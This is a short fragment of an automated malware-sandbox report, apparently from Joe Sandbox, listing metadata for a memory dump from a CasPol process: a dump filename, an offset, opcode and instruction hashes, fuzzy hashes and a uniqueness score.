                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753616995.00000000035AB000.00000040.00000400.00020000.00000000.sdmp, Offset: 035AB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_35ab000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79b473c4e7a4526788564170aca22b1a214654cd5ae0d369c6fb702a720ebcd4
                                        • Instruction ID: 98325fd4b2ad78a96e84278e879d9dd0f04a2f76491e046a5cc6c8545dc8e9c0
                                        • Opcode Fuzzy Hash: 79b473c4e7a4526788564170aca22b1a214654cd5ae0d369c6fb702a720ebcd4
                                        • Instruction Fuzzy Hash: 19B01230101D41CFCE11CB0CC574F4073F0E7027D0F044780E810876A4C3149C01C500
                                        Uniqueness

                                        Uniqueness Score: -1.00%